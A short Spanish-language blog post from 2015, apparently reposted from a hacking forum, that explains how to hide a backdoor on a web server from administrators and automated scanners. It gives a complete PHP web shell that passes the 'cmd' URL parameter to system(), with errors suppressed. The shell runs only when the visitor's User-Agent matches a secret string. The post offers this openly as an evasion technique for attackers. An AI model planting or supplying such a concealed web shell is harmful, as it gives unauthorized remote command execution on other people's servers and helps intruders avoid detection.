miércoles, 26 de agosto de 2015

Ocultando Backdoor a través del User-Agent

Como todos sabemos, esconder un backdoor a veces no es un trabajo sencillo, ya que, sin contar de que el sysadmin sea inteligente, hay scripts automatizados que se encargan de buscar este tipo de backdoors.

Así que, un método para evitar esto, es jugar con el User-Agent de nuestro navegador.

Con un código bastante simple, podemos proteger nuestro backdoor de visitas indeseadas:


  1. <?php
  2. if ($_SERVER['HTTP_USER_AGENT'] == "blackdrake")
  3. {
  4.         @system($_GET['cmd']);
  5. }
  6. ?>


De este modo, con una visita normal, no podremos ejecutar los comandos:


En cambio, modificando el User-Agent por blackdrake, si que podremos:



Algo muy sencillo pero que a algunos le vendrá bastante bien.

Un saludo.

Fuente: https://underc0de.org/foro/seguridad-en-servidores/ocultando-backdoor-a-traves-del-user-agent/

Publicado por en
Etiquetas: , ,

No hay comentarios:

Publicar un comentario

Suscribirse a: Enviar comentarios (Atom)